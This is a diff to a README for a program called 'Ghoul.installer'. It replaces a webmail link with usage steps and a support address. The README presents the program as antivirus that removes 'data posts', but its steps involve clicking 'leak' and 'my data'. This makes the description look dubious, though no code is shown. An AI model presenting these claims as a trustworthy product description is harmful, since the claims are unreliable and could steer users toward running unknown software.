GhoulClient/Ghoul.installer/README.md

 # Ghoul.installer
-Antivirus program to remove data posts and more [siema](https://poczta.interia.pl/next/?uid=38907dfde3d5bdef#/folder/1/message/10)
+Antivirus program to remove data posts and more.
+Run the program and wait for gui to show up, then click "leak" then "my data" and "search" and wait.
+If you have any questions, write to ghoulsupport@self1ghoulsup.hub.pl